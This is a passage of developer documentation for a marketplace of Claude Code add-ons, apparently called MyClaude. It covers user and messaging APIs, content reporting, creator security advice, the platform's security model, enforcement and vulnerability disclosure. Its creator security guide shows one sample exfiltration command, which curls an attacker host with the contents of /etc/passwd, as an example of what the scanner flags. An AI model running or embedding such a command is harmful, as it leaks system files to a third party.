[Downloads API](/docs/api/downloads) -- Signed URL download flow - [Payments API](/docs/api/payments) -- Checkout and purchase flow - [Publishing Guide](/docs/creators/publishing) -- End-to-end publishing walkthrough - [CLI Commands](/docs/cli/commands) -- CLI command reference --- # Users API The Users API manages user profiles, social relationships, direct messaging, and account lifecycle. All endpoints require authentication. ## Update profile Update the authenticated user's profile. Changes to username and display name are cascaded to all products authored by the user. Username uniqueness is enforced atomically via a dedicated `usernames` collection in Firestore. ``` POST /users/update-profile ``` **Auth:** Required (Bearer token) **Rate limit:** 5/min (strict) ### Request body ```json { "displayName": "Jane Doe", "username": "janedoe", "bio": "Building tools for the Claude Code ecosystem", "country": "US", "avatarUrl": "https://example.com/avatar.jpg" } ``` | Field | Type | Required | Constraints | |-------|------|----------|-------------| | `displayName` | string | Yes | Max 50 characters | | `username` | string | Yes | Lowercase alphanumeric + `_` + `-`, 3--30 characters. Must match `/^[a-z0-9_-]{3,30}$/` | | `bio` | string | No | Max 500 characters | | `country` | string | No | Max 100 characters | | `avatarUrl` | string | No | Must be a valid HTTPS URL | ### Response ```json { "success": true } ``` ### Side effects When username, display name, or avatar changes, the server cascades the update to all products authored by this user (denormalized fields: `authorUsername`, `authorDisplayName`, `authorAvatar`). Updates are batched in chunks of 500 documents. Username changes are audited in the server log. ### Errors | Status | Condition | |--------|-----------| | 400 | Invalid display name, username format, bio/country too long, or invalid avatar URL | | 404 | User profile not found | | 409 | Username is taken by another user | --- ## Follow / unfollow Toggle a follow relationship with another user. Uses a Firestore transaction for atomic counter updates on both users. ``` POST /users/follow ``` **Auth:** Required (Bearer token) **Rate limit:** 30/min (strict) ### Request body ```json { "targetUid": "uid_of_user_to_follow" } ``` | Field | Type | Required | Description | |-------|------|----------|-------------| | `targetUid` | string | Yes | UID of the user to follow or unfollow | ### Response ```json { "following": true } ``` `following: true` means the follow was created. `following: false` means the follow was removed (toggled off). ### Side effects - Creates/deletes documents in both `users/{myUid}/following` and `users/{targetUid}/followers` subcollections. - Increments/decrements `stats.following` on the current user and `stats.followers` on the target user. ### Errors | Status | Condition | |--------|-----------| | 400 | Missing targetUid, or attempting to follow yourself | | 404 | Target user not found | --- ## Delete account Permanently delete the authenticated user's account. This is an irreversible operation that anonymizes the user profile, removes all products, cleans up subcollections, and deletes the Firebase Auth account. ``` DELETE /users/delete-account ``` **Auth:** Required (Bearer token) **Rate limit:** 1/min (strict) ### Request body None. ### Response ```json { "success": true } ``` ### Deletion sequence The server performs these steps in order: | Step | Action | Details | |------|--------|---------| | 0 | Release username | Deletes the username reservation from the `usernames` collection | | 1 | Anonymize profile | Sets display name to "Deleted User", clears bio, avatar, email, Stripe data | | 2 | Remove products | Sets all user's products to `status: "removed"`, anonymizes author fields | | 3 | Delete achievements | Removes all documents in `users/{uid}/achievements` | | 4 | Delete following | Removes all documents in `users/{uid}/following` | | 5 | Delete followers | Removes all documents in `users/{uid}/followers` | | 6 | Delete Firebase Auth | Deletes the Firebase Authentication account (irreversible) | An audit trail is written before deletion begins, recording the username and product count. ### Errors | Status | Condition | |--------|-----------| | 404 | User profile not found | --- ## List conversations Retrieve all conversations the authenticated user is participating in, ordered by most recent message. ``` GET /messages ``` **Auth:** Required (Bearer token) **Rate limit:** 60/min (standard) ### Response ```json { "conversations": [ { "id": "productId_buyerUid", "productId": "abc123", "productTitle": "Code Review Skill", "productSlug": "code-review-skill", "buyerUid": "uid_buyer", "buyerUsername": "buyer1", "buyerDisplayName": "Buyer One", "buyerAvatar": "https://...", "sellerUid": "uid_seller", "sellerUsername": "seller1", "sellerDisplayName": "Seller One", "sellerAvatar": "https://...", "participants": ["uid_buyer", "uid_seller"], "lastMessage": "Thanks for the quick response!", "lastMessageAt": "2026-03-24T16:30:00.000Z", "lastMessageSenderUid": "uid_buyer", "unreadBySeller": 1, "unreadByBuyer": 0, "createdAt": "2026-03-24T10:00:00.000Z" } ] } ``` Returns up to 50 conversations. --- ## Send a message Send a message about a product. Buyers can initiate conversations; sellers can only reply to existing ones. A conversation is uniquely identified by `{productId}_{buyerUid}`. ``` POST /messages ``` **Auth:** Required (Bearer token) **Rate limit:** 20/min (strict) ### Request body ```json { "productId": "abc123", "text": "Is this compatible with Claude Code 2.0?" } ``` | Field | Type | Required | Constraints | |-------|------|----------|-------------| | `productId` | string | Yes | Valid product ID | | `text` | string | Yes | 1--1000 characters | ### Response ```json { "success": true, "conversationId": "abc123_uid_buyer" } ``` ### Side effects - Creates a conversation document if one does not exist (buyer-initiated only). - Increments the unread counter for the recipient. - Creates a notification for the recipient. ### Errors | Status | Condition | |--------|-----------| | 400 | Missing productId, empty text, text too long, or seller has no conversation to reply to | | 404 | Product not found | --- ## Get conversation messages Retrieve messages in a specific conversation. Marks the conversation as read for the authenticated user. ``` GET /messages/{conversationId} ``` **Auth:** Required (Bearer token, must be a conversation participant) **Rate limit:** 60/min (standard) ### Path parameters | Parameter | Type | Description | |-----------|------|-------------| | `conversationId` | string | Conversation ID (format: `{productId}_{buyerUid}`) | ### Response ```json { "messages": [ { "id": "msg_001", "senderUid": "uid_buyer", "senderUsername": "buyer1", "senderDisplayName": "Buyer One", "senderAvatar": "https://...", "text": "Is this compatible with Claude Code 2.0?", "createdAt": "2026-03-24T10:05:00.000Z" } ], "conversation": { "id": "abc123_uid_buyer", "productTitle": "Code Review Skill", "productSlug": "code-review-skill", "buyerUsername": "buyer1", "buyerDisplayName": "Buyer One", "buyerAvatar": "https://...", "sellerUsername": "seller1", "sellerDisplayName": "Seller One", "sellerAvatar": "https://...", "buyerUid": "uid_buyer", "sellerUid": "uid_seller" } } ``` Returns up to 100 messages per conversation, ordered oldest first. ### Errors | Status | Condition | |--------|-----------| | 403 | Authenticated user is not a participant in this conversation | | 404 | Conversation not found | --- ## Server-side user data (internal) User profiles and product listings are rendered server-side for SEO via Next.js Server Components. These are **not public API endpoints** -- they are internal `lib/server/` functions used during SSR: | Function | Path | Description | |----------|------|-------------| | `getUserProfile(uid)` | `lib/server/users.ts` | Fetch user profile by UID | | `getUserByUsername(username)` | `lib/server/users.ts` | Fetch user profile by username | These functions return full profile data which is then stripped to `SafeUserProfile` before being passed to client components. --- ## Related pages - [API Overview](/docs/api/overview) -- Auth model, rate limits, error format - [Products API](/docs/api/products) -- Product operations - [Payments API](/docs/api/payments) -- Stripe Connect setup for creators - [Creator Onboarding](/docs/creators/onboarding) -- Getting started as a creator - [Security Model](/docs/security/model) -- How user data is protected --- # Content Reporting You can report any product, review, or user on MyClaude by clicking the flag icon. Reports are reviewed by the admin team and resolved within 3 business days. ## What can you report? | Target | Where to find the flag | Report type | |--------|------------------------|-------------| | **Product** | Product page sidebar (product actions area) | `product` | | **Review** | Below each review in the review list | `review` | | **User** | User profile header | `user` | Report any content that violates the [Content Policy](/docs/legal/content-policy), including malicious code, plagiarism, deceptive descriptions, harassment, or spam. ## How to file a report 1. **Sign in** to your MyClaude account. Reporting requires authentication. 2. **Navigate** to the product page, review, or user profile you want to report. 3. **Click the flag icon.** A report dialog opens. 4. **Select a reason** from the dropdown. Options match common policy violations. 5. **Add a description** in the text area. Include specific details -- what you observed, why it violates policy, and any relevant context. 6. **Submit.** You receive a confirmation that your report was filed. Your report goes directly to the admin review queue. You will not see updates on report status -- the admin team handles resolution internally. ## What happens after you report? Your report enters the admin Reports tab for review. The admin team evaluates each report against the [Content Policy](/docs/legal/content-policy). | Outcome | What happens | |---------|-------------| | **Report resolved** | The reported content is actioned -- product removed, review deleted, or user banned depending on severity | | **Report dismissed** | The admin determined the content does not violate policy. No action is taken. | Resolution typically happens within 3 business days. High-severity reports (malicious code, credential theft) are prioritized. ## Rate limits To prevent abuse, reporting is rate-limited: | Limit | Value | |-------|-------| | Per target per day | 1 report per user per target. You cannot report the same product, review, or user more than once per day. | | API rate limit | 10 reports per minute (across all targets) | If you hit the daily limit, the dialog will inform you. Wait 24 hours before reporting the same target again. ## Quarantine system New products from unverified users do not go live immediately. They enter a **quarantine** state (`pending_review`) until an admin approves them. - **Unverified users** -- products start as `pending_review` and appear in the admin Quarantine tab - **Verified creators** -- products publish immediately as `published`, bypassing quarantine This provides a pre-listing review layer for new or unverified accounts. Quarantine is separate from the report system -- it applies automatically at publish time, not in response to a report. ## Content policy reference The full list of prohibited content categories and enforcement actions is in the [Content Policy](/docs/legal/content-policy). Key categories: - Malicious code (shell injection, data exfiltration) - Credential theft - Plagiarism or unauthorized redistribution - Deceptive product descriptions - Harassment or abuse - CSAM (zero tolerance, reported to authorities) ## Appeal process If your content was removed or your account was actioned and you believe the decision was incorrect: 1. Visit the [Contact page](/contact) 2. Include your username, the affected product or review, and why you believe the action was incorrect 3. Appeals are reviewed by a team member who was not involved in the original decision 4. Expect a response within 14 business days Do not create a new account to circumvent a ban -- this results in permanent suspension of all associated accounts. ## Related pages - [Trust & Safety](/docs/security/trust-safety) -- enforcement policy, scanning, and dispute resolution - [Content Policy](/docs/legal/content-policy) -- full prohibited content definitions - [Admin Panel](/docs/developers/admin-panel) -- how admins process reports (developer reference) - [Security Model](/docs/security/model) -- authentication and authorization architecture --- # Creator Security Guide Security best practices for MyClaude product creators: protecting your accounts, passing content scans, designing secure products, and responding to reports. Publishing products on a marketplace means your code runs in other people's environments. That is a trust relationship, and it demands care. This guide covers what you need to know to keep your accounts safe, your products clean, and your reputation intact. ## Protect your MyClaude account Your MyClaude account controls your published products, revenue, and creator identity. A compromised account means someone else can publish products under your name. **Use a strong, unique password.** Do not reuse passwords from other services. A password manager is the most reliable way to handle this. **Enable two-factor authentication (2FA).** MyClaude uses Firebase Auth, which supports 2FA via authenticator apps. Enable it in your [account settings](/settings). If your password is compromised, 2FA prevents unauthorized login. **Keep your CLI session secure.** `myclaude login` stores an authentication token locally. On shared machines, always run `myclaude logout` when you are done. Do not share your token or copy it between machines. | Practice | Why it matters | |----------|---------------| | Unique password | Credential stuffing attacks use leaked passwords from other services | | 2FA enabled | Stops unauthorized access even if password is compromised | | `myclaude logout` on shared machines | Local tokens grant full account access | | Separate email for creator account | Limits blast radius if your primary email is compromised | ## Protect your Stripe Connect account Your Stripe Connect Express account is how you get paid. MyClaude never holds your funds — Stripe pays you directly. **Do not share your Stripe dashboard credentials.** Your Stripe account is connected to MyClaude via OAuth. MyClaude cannot access your Stripe login. Keep it that way. **Monitor your payouts.** Check your Stripe dashboard regularly for unexpected transactions. If you see payouts you did not expect, contact both Stripe and MyClaude support immediately. **Understand the connection.** When you connect Stripe via MyClaude, you are authorizing MyClaude to create charges on your behalf (with the 8% platform fee) and route payouts to your account. MyClaude cannot withdraw funds from your account, change your bank details, or access your Stripe password. If you ever want to disconnect your Stripe account, you can do so from your Stripe dashboard under Connected Accounts. This will prevent new sales but will not affect already-completed payouts. ## Content scanning: what it checks Every product you publish passes through the CONDUIT pipeline, which runs `myclaude scan` before your product appears on the marketplace. Understanding what the scanner checks helps you avoid false rejections. ### Scan categories | Check | What it detects | Common false positive triggers | |-------|-----------------|-------------------------------| | **Secrets detection** | API keys, tokens, private keys, credentials, high-entropy strings | Example keys in documentation, base64-encoded non-secret data | | **Malicious patterns** | Shell injection, network exfiltration, unauthorized filesystem access | Legitimate `curl` examples, file-reading instructions in skills | | **Policy violations** | Content that violates the [Content Policy](/docs/legal/content-policy) | None typical — policy violations are clear-cut | | **Manifest validation** | Missing `vault.yaml` fields, invalid version format, unrecognized category | Typos in category names, missing required fields | ### How to pass the scan **Never include real secrets in your product files.** This is the most common rejection reason. The scanner uses both pattern matching and entropy analysis to detect secrets. If your product includes example configuration, use clearly fake values: ```yaml # Good — obviously fake api_key: "YOUR_API_KEY_HERE" token: "sk_test_example_not_a_real_key" # Bad — looks like a real key (will be flagged) api_key: "sk_live_4eC39HqLyjWDarjtT1zdp7dc" ``` **If your skill needs to reference API calls or shell commands,** frame them as instructional rather than executable. The scanner looks for patterns that exfiltrate data or execute arbitrary commands. ```markdown # Good — instructional To check the status, the user should run: `curl https://api.example.com/status` # Risky — looks like exfiltration `curl https://attacker.com/collect?data=$(cat /etc/passwd)` ``` **Run `myclaude scan` locally before publishing.** This runs the same checks that the CONDUIT pipeline runs. Fix any issues before they block your publish. ```bash $ cd my-product/ $ myclaude scan # All checks passed. ``` If a scan fails, the error message tells you exactly which check failed and where. Fix the flagged issue and scan again. ## vault.yaml security The `vault.yaml` manifest is verified during publishing. Two fields have security implications: ### Author verification The `author` field in your `vault.yaml` must match your authenticated MyClaude username. You cannot publish a product attributed to another creator. ```yaml # This must match your MyClaude username author: "@your-username" ``` If you change your username, update your `vault.yaml` files before republishing. The API rejects mismatches. ### Version monotonicity Version numbers must increase with each publish. You cannot publish version `1.0.0` if version `1.0.1` already exists. This prevents version rollback attacks where a compromised account publishes an older, vulnerable version of a product. ```yaml # If 1.2.0 is already published, the next version must be > 1.2.0 version: "1.2.1" # Valid version: "1.1.0" # Rejected — lower than existing version: "1.2.0" # Rejected — equal to existing ``` ## Design secure products Your products run inside buyers' Claude Code environments. Design them to be trustworthy. **Request only the permissions you need.** If your skill only needs to read files, do not include instructions that write to the filesystem. If it only needs to access one API, do not include broad network instructions. **Be transparent about what your product does.** Your product description should accurately reflect its behavior. A skill described as "code reviewer" that also modifies files will lose trust and may be reported. **Do not hardcode paths or credentials.** Products should work across environments. Use environment variables or prompt the user for configuration values. **Handle errors gracefully.** A product that crashes on unexpected input can leave a user's environment in a bad state. Validate inputs and fail with clear messages. | Principle | Implementation | |-----------|---------------| | Minimal permissions | Only reference the tools and access your product actually needs | | Transparency | Description matches actual behavior | | Portability | No hardcoded paths, credentials, or environment assumptions | | Graceful failure | Validate inputs, provide clear error messages | | No side effects | Do not modify files, settings, or state outside your product's scope | ## What happens when your product is reported Any MyClaude user can report a product for violating the [Content Policy](/docs/legal/content-policy) or for security concerns. Here is what happens: 1. **Report received.** The MyClaude team reviews the report. During review, the product remains listed unless the report indicates an active security threat. 2. **Investigation.** We examine the product files, the report details, and your product's scan history. If the report involves a security vulnerability, we may run additional automated analysis. 3. **Outcome.** One of three outcomes: - **Report dismissed** — no violation found. Your product is unaffected. You are not notified of dismissed reports. - **Modification required** — a minor issue is found. You receive an email explaining what needs to change and a deadline (typically 7 days). The product remains listed during this period. - **Product delisted** — a serious violation is confirmed. The product is removed from the marketplace immediately. You receive an email with the reason and your options. 4. **Appeal.** If your product is delisted, you can appeal by responding to the notification email with additional context. Appeals are reviewed within 5 business days. Repeated violations may result in account restrictions. See [Trust & Safety](/docs/security/trust-safety) for the full enforcement framework. ## Responding to vulnerability reports If a buyer or security researcher contacts you about a vulnerability in your product: **Acknowledge promptly.** Respond within 48 hours, even if you need more time to investigate. Silence erodes trust. **Do not dismiss reports without investigation.** Even if a report seems unlikely, check. The reporter may have found something you missed. **Fix and republish.** Patch the vulnerability, bump the version, and publish the update. Buyers who have installed your product will see the update available via `myclaude update`. **Credit the reporter** in your changelog or release notes if they are comfortable being named. This encourages responsible disclosure. If a vulnerability report is sent to security@myclaude.sh instead of to you directly, MyClaude will coordinate between you and the reporter. See [Vulnerability Disclosure](/docs/security/vulnerability-disclosure) for the full process. ## Common security mistakes These are the mistakes creators make most frequently. All of them are avoidable. | Mistake | Consequence | Prevention | |---------|-------------|------------| | Including `.env` or credentials in product files | Scan rejection; if undetected, exposes your API keys to every buyer | Add `.env` to `.gitignore`; use `YOUR_KEY_HERE` placeholders | | Hardcoding file paths (`/Users/yourname/...`) | Product fails on other machines; may expose your directory structure | Use relative paths or environment variables | | Publishing without running `myclaude scan` | Rejected at publish time; wastes time debugging in the CONDUIT pipeline | Always `myclaude scan` locally first | | Using `version: "1.0.0"` on every update | Publish rejected after first release (version must increase) | Increment version before every publish | | Overly broad shell instructions in skills | Scanner may flag as malicious; buyers may distrust your product | Scope instructions to the minimum necessary | | No error handling | Product crashes leave buyer environments in bad state | Validate inputs, handle edge cases, fail with clear messages | | Mismatched `author` field | Publish rejected — author must match authenticated username | Verify `author` in `vault.yaml` matches your account | | Including test data with realistic PII | May trigger content policy scan; raises trust concerns | Use obviously synthetic test data | ## Security checklist Before every publish, verify: - [ ] `myclaude scan` passes locally with no warnings - [ ] No real API keys, tokens, or credentials in any file - [ ] `vault.yaml` version is higher than the currently published version - [ ] `vault.yaml` author matches your MyClaude username - [ ] Product description accurately reflects what the product does - [ ] No hardcoded paths or environment-specific assumptions - [ ] Error cases are handled with clear messages - [ ] Sensitive operations (if any) are documented in the product description ## Related pages - [Security Model](/docs/security/model) — platform security architecture - [Trust & Safety](/docs/security/trust-safety) — content enforcement and dispute resolution - [Content Policy](/docs/legal/content-policy) — what is and is not allowed on the marketplace - [Vulnerability Disclosure](/docs/security/vulnerability-disclosure) — reporting security issues - [vault.yaml Specification](/docs/creators/vault-yaml) — manifest format reference - [Publishing Your First Product](/docs/creators/publishing) — step-by-step publishing tutorial --- # Security Model MyClaude protects users through 6 security layers: Firebase Auth with JWT tokens, Firestore security rules blocking direct client writes to sensitive fields, signed URLs for paid file downloads (5-minute expiry), CSRF middleware on all mutations, automated content scanning with 22 malicious pattern detectors, and rate limiting on all API mutation routes. No single control protects everything — a bug in one layer cannot bypass the others. ## Authentication Every user session is backed by Firebase Authentication. When you log in, Firebase issues a JWT (JSON Web Token) that is valid for 1 hour and automatically refreshed client-side. | Mechanism | Detail | |-----------|--------| | Provider | Firebase Auth (email/password, Google OAuth) | | Token type | Firebase ID Token (JWT, RS256 signed) | | Token expiry | 1 hour, auto-refreshed by Firebase SDK | | Token delivery | `Authorization: Bearer {token}` on every API request | Unauthenticated users can browse public product listings. Any action that writes data — purchasing, publishing, downloading a paid file — requires a valid token. ## Authorization MyClaude uses a dual Firebase SDK architecture. The server-side Admin SDK handles all privileged operations; the client-side SDK is scoped to public reads and authenticated user operations. | Context | SDK | Role | |---------|-----|------| | Next.js Server Components (SSR) | Firebase Admin | Read product/user data server-side | | API Routes (mutations) | Firebase Admin | Verify tokens, write orders, generate signed URLs | | Browser (client components) | Firebase Client SDK | Auth state, public reads, user profile updates | Every API route that performs a mutation follows this verification sequence: 1. Extract `Authorization: Bearer {token}` from request headers 2. Call `admin.auth().verifyIdToken(token)` — rejects expired or tampered tokens 3. Use the decoded UID to confirm the caller is authorized for the requested resource 4. Return `401 Unauthorized` if the token is missing, expired, or invalid ## Data Protection Firestore security rules enforce ownership at the database layer, independent of application logic. This means a bug in application code cannot grant a user access to another user's private data. | Collection | Read rule | Write rule | |------------|-----------|------------| | `products` | Public (published products) | Owner only | | `users` | Public (profile data) | Owner only | | `orders` | Owner only | Webhook only (Admin SDK) | | `reviews` | Public | Authenticated buyers only | Sensitive fields — such as raw Stripe account identifiers and internal file storage paths — are never included in client-facing API responses. ## File Storage Product files for paid products are never exposed directly to the browser. File URLs in Firestore are admin-only fields. The download flow: ``` User clicks Download → POST /api/products/download (with auth token) → API verifies token → For paid products: confirms purchase order exists for this user + product → For free products: allows immediately → Generates a signed URL (5-minute expiry, single-use intent) → Returns URL → Client opens in new tab ``` | Control | Value | |---------|-------| | Direct file URL exposure | Never — `fileUrl` field is server-only | | Signed URL expiry | 5 minutes | | Storage bucket read rules | `allow read: if false` (signed URLs bypass this) | | Paid product access | Order existence verified before URL generation | ## Content Scanning Every product submitted via `myclaude publish` passes through the CONDUIT pipeline before appearing on the marketplace. The pipeline runs `myclaude scan` against the product bundle. | Check | What it detects | |-------|----------------| | Secrets scan | API keys, tokens, credentials, private keys | | Malicious patterns | Shell injection, network exfiltration patterns | | Prohibited content | Content policy violations (see [Content Policy](/docs/legal/content-policy)) | | Manifest validation | Required `vault.yaml` fields, version format, category validity | Products that fail any scan are rejected before listing. Creators receive a specific error message identifying the violation. ## Payment Security Payments are processed entirely by Stripe. MyClaude never handles raw card data. | Control | Detail | |---------|--------| | Payment processor | Stripe (PCI DSS Level 1 certified) | | Creator payouts | Stripe Connect Express — MyClaude never holds creator funds | | Order creation | Server-side only, triggered by Stripe webhook | | Webhook verification | `stripe.webhooks.constructEvent` validates every webhook signature | | Platform fee | 8% retained via Stripe Connect application fee | **Orders are created exclusively by the Stripe webhook handler.** There is no client-side code path that can create an order. A buyer purchasing a product through any means other than Stripe checkout will not receive a valid order record, and will be denied file access. ## Rate Limiting All mutation API routes are protected by server-side rate limiting to prevent abuse. | Endpoint category | Limit | |-------------------|-------| | Auth-required mutations | 60 requests / minute per user | | Stripe checkout initiation | 10 requests / minute per user | | File download | 20 requests / minute per user | ## Related pages - [Vulnerability Disclosure](/docs/security/vulnerability-disclosure) — how to report security issues - [Trust & Safety](/docs/security/trust-safety) — content enforcement and marketplace integrity - [Content Policy](/docs/legal/content-policy) — prohibited content rules --- # Trust & Safety MyClaude enforces content policies, automated scanning, and human review to maintain marketplace trust. Every product on MyClaude passes through controls at publish time and is subject to ongoing review. This page explains how those controls work. ## Content Scanning When a creator runs `myclaude publish`, the CONDUIT pipeline runs `myclaude scan` against the full product bundle before any listing is created. Scanning is not optional and cannot be bypassed. | Scan type | What is checked | |-----------|----------------| | **Secrets detection** | API keys, tokens, private keys, credentials — flagged by pattern matching and entropy analysis | | **Malicious code patterns** | Shell injection, network exfiltration, unauthorized file access, data exfiltration payloads | | **Prohibited content** | Content that violates the [Content Policy](/docs/legal/content-policy) | | **Manifest integrity** | `vault.yaml` schema validity, required fields, version format, category classification | A product that fails any scan is rejected before listing. The creator receives a specific, actionable error message. Scan results are not published publicly. Passing automated scanning does not guarantee a product is free of all issues — it establishes a baseline. Additional controls apply after listing. ## MCS Certification MCS (MyClaude Certified Standard) is a quality badge awarded to products that pass both automated review and a manual human review. | Level | Controls | |-------|---------| | Listed (no badge) | Automated scan passed | | MCS Certified | Automated scan + manual human review | MCS-certified products: - Appear higher in search results - Display a verification badge on the product page and in CLI output - Have passed a human review of code quality, documentation completeness, and content policy compliance Creators can request MCS review after publishing by contacting support. Review time varies by product complexity; expect 3-7 business days at current scale. ## Prohibited Content The following categories of content are prohibited on MyClaude and will be rejected at scan time or removed after listing if identified later. Full definitions are in the [Content Policy](/docs/legal/content-policy). | Category | Examples | |----------|---------| | Malicious code | Any code designed to harm, surveil, or exploit systems or users | | Credential theft | Products that capture, transmit, or store user credentials without disclosure | | Data exfiltration | Products that send user data to third parties without disclosure | | CSAM | Zero tolerance; immediately reported to authorities | | Deceptive products | Products that misrepresent their function, category, or capabilities | | Plagiarism | Products that copy another creator's work without license or attribution | | Illegal content | Content that violates applicable law | ## Post-Listing Monitoring Automated scanning at publish time is the first line of defense. Additional controls apply after a product is live: - **Community reports** — Buyers and creators can report products via the product page. Reports are reviewed within 3 business days. - **Periodic re-scan** — Published products are subject to re-scanning if the policy or scan rules are updated. - **Creator account review** — Repeated violations result in account suspension. ## Dispute Resolution Disputes between buyers and creators are handled as follows: | Dispute type | Resolution path | |--------------|----------------| | Product does not work as described | Contact creator first; escalate to MyClaude support if unresolved within 7 days | | Unauthorized charge | Contact MyClaude support; Stripe dispute process applies | | Creator misconduct | Report via product page; MyClaude reviews within 3 business days | | Creator account impersonation | Report to security@myclaude.sh | MyClaude acts as a platform intermediary. We do not arbitrate commercial disputes between buyers and creators but will remove products and suspend accounts when policy violations are confirmed. Refund decisions on paid products rest with the creator, except where law requires otherwise. MyClaude reserves the right to issue refunds and recover platform fees in cases of confirmed fraud or policy violation. ## Enforcement Actions | Violation severity | Action | |-------------------|--------| | Minor / first offense | Warning + required fix within 7 days | | Moderate / repeat offense | Product unpublished pending review | | Severe (malicious code, CSAM) | Immediate account suspension, product removal, authorities notified where applicable | Creators may appeal enforcement actions by emailing support@myclaude.sh within 14 days of the action. Appeals are reviewed by a team member not involved in the original decision. ## Related pages - [Security Model](/docs/security/model) — authentication, authorization, and infrastructure security - [Vulnerability Disclosure](/docs/security/vulnerability-disclosure) — how to report security issues - [Content Policy](/docs/legal/content-policy) — full prohibited content definitions --- # Vulnerability Disclosure Report security vulnerabilities to security@myclaude.sh. We respond within 48 hours. MyClaude is a pre-launch marketplace. We take security reports seriously and treat all good-faith researchers with respect. ## How to Report Send an email to **security@myclaude.sh** with the subject line: `[SECURITY] Brief description`. Do not open a public GitHub issue for security vulnerabilities. Do not post vulnerability details publicly before we have had a chance to respond and remediate. ## What to Include The more detail you provide, the faster we can triage and fix the issue. | Field | Description | |-------|-------------| | **Summary** | One-sentence description of the vulnerability | | **Severity estimate** | Critical / High / Medium / Low (your assessment) | | **Affected component** | URL, API route, feature, or system | | **Steps to reproduce** | Numbered step-by-step reproduction | | **Proof of concept** | Screenshot, video, or code demonstrating impact | | **Impact** | What can an attacker achieve? What data is at risk? | | **Suggested fix** | Optional — your recommendations | If you are unsure whether something is a vulnerability, send it anyway. We would rather receive a false positive than miss a real issue. ## Response Timeline | Stage | Target | |-------|--------| | Initial acknowledgment | Within 48 hours | | Severity confirmation | Within 5 business days | | Fix shipped (critical) | Within 7 days of confirmation | | Fix shipped (high) | Within 14 days of confirmation | | Fix shipped (medium/low) | Within 30 days of confirmation | | Public disclosure coordination | Agreed with reporter | We will keep you informed at each stage. If you have not heard from us within 48 hours, send a follow-up — our spam filter may have caught your original message. ## Scope The following systems are in scope for vulnerability reports: | System | Examples | |--------|---------| | **Web application** | myclaude.sh and all subdomains | | **API routes** | `/api/stripe/`, `/api/products/`, `/api/users/` | | **Authentication** | Login, token handling, session management | | **Authorization** | Access control, data isolation between users | | **File access** | Paid product download controls, signed URL bypass | | **Payment flow** | Stripe checkout, webhook verification | | **CLI** | `@myclaude-cli/cli` npm package | ## Out of Scope The following are not eligible for reports: - Vulnerabilities in third-party services (Firebase, Stripe, Vercel) — report those directly to the respective vendor - Social engineering attacks against MyClaude team members - Physical attacks against infrastructure - Denial of service (DoS/DDoS) attacks - Reports that require unlikely user interaction (e.g., user must already be an admin) - Automated scanner output without confirmed impact - Missing security headers without demonstrated exploit - Rate limiting on non-sensitive endpoints ## Safe Harbor MyClaude supports responsible disclosure. If you report a vulnerability in good faith following these guidelines: - We will not pursue legal action against you - We will not refer you to law enforcement - We will treat your report confidentially until an agreed disclosure date - We will credit you in our changelog if you choose to be named Good faith means: you did not access, modify, or exfiltrate data beyond what was needed to demonstrate the vulnerability; you did not perform destructive testing; you did not target other users' accounts. ## Related pages - [Security Model](/docs/security/model) — full security architecture - [Trust & Safety](/docs/security/trust-safety) — content enforcement - [Content Policy](/docs/legal/content-policy) — prohibited content and enforcement --- # Admin Panel The MyClaude admin panel lives at `/admin` and requires `role=admin` on the authenticated user. All admin actions are audit-logged to the `audit_logs` Firestore collection. ## Accessing the admin panel Navigate to `https://myclaude.sh/admin`. The server checks the user's role via `getUserRole()` before rendering. Users without `role=admin` receive a 403 response. There is no link to the admin panel in the public navigation. ## RBAC model MyClaude uses three special roles (hardcoded by UID, not stored in Firestore) plus two Firestore-level user roles. | Role | Source | Publish | Purchase | Admin panel | Ban users | Remove products | |------|--------|---------|----------|-------------|-----------|-----------------| | `user` | Firestore | No | Yes | No | No | No | | `creator` | Firestore | Yes | Yes | No | No | No | | `verified_creator` | Firestore | Yes (auto-published) | Yes | No | No | No | | `moderator` | Hardcoded UID | Yes | Yes | No | No | No | | `admin` | Hardcoded UID | Yes | Yes | Yes | Yes | Yes | | `ceo` | Hardcoded UID | Yes | Yes | Yes | Yes | Yes | Key constraints: - **Moderators have zero admin panel access.** Every admin API route checks `if (!role || role === "moderator")` and returns 403. Moderators exist for future use but currently have no elevated privileges. - **Only `admin` and `ceo` roles can access admin operations.** The `isAdmin()` helper checks `role === "ceo" || role === "admin"`. - **Verified creators bypass quarantine.** Their products publish immediately as `published` instead of `pending_review`. - **Special roles are hardcoded** in `src/lib/roles.ts` by UID mapping, not stored in Firestore (prevents privilege escalation via database tampering). ## Reports tab Displays all content reports sorted by creation date (newest first). ### Report fields | Field | Type | Description | |-------|------|-------------| | `id` | string | Report document ID | | `type` | enum | `product`, `review`, or `user` | | `targetId` | string | ID of the reported product, review, or user | | `reporterUid` | string | UID of the user who filed the report | | `reason` | string | Selected reason from the report dialog | | `description` | string | Free-text description provided by the reporter | | `status` | enum | `pending`, `resolved`, `dismissed` | | `createdAt` | timestamp | When the report was filed | | `resolvedAt` | timestamp | When the report was resolved or dismissed (null if pending) | | `resolvedBy` | string | Admin UID who resolved the report (null if pending) | ### Actions - **Resolve** -- Marks the report as `resolved` and triggers the appropriate enforcement action (remove product, delete review, or ban user). - **Dismiss** -- Marks the report as `dismissed` with no enforcement action. Both actions are recorded in the audit log. ## Quarantine tab Lists all products with `status: pending_review`. Products enter quarantine when a non-verified user publishes. ### Actions | Action | Effect | |--------|--------| | **Approve** | Sets product status to `published`. Product becomes visible in search and explore. | | **Remove** | Sets product status to `removed`. Product is hidden from all public surfaces. | Verified creators (`verified_creator`, `moderator`, `admin`) skip quarantine entirely -- their products publish as `published` on creation. ## Users tab Search users by username or email. Displays role, verification status, and product count. ### Ban user Banning a user triggers a cascade: 1. User's `banned` field is set to `true` 2. All of the user's products are set to `status: removed` 3. User receives `403 Forbidden` on all subsequent mutation API calls (ban check runs after token verification) Ban requires a confirmation dialog. Only `admin` role can execute bans. ## Admin API routes All admin routes require `Authorization: Bearer {token}` with a decoded user whose role passes the `getUserRole()` check. | Method | Path | Description | Required role | Rate limit | Mode | |--------|------|-------------|---------------|------------|------| | `GET` | `/api/admin/reports` | List all reports | `admin`, `ceo` | 30/min | standard | | `POST` | `/api/admin/reports/[id]/resolve` | Resolve or dismiss a report | `admin`, `ceo` | 10/min | strict | | `POST` | `/api/admin/products/[id]/approve` | Approve a quarantined product | `admin`, `ceo` | 10/min | strict | | `POST` | `/api/admin/products/[id]/remove` | Remove a product (cascade) | `admin`, `ceo` | 10/min | strict | | `POST` | `/api/admin/users/[id]/ban` | Ban a user (cascade products) | `admin`, `ceo` | 5/min | strict | Mutation routes use **strict (fail-closed)** rate limiting — if the rate limiter 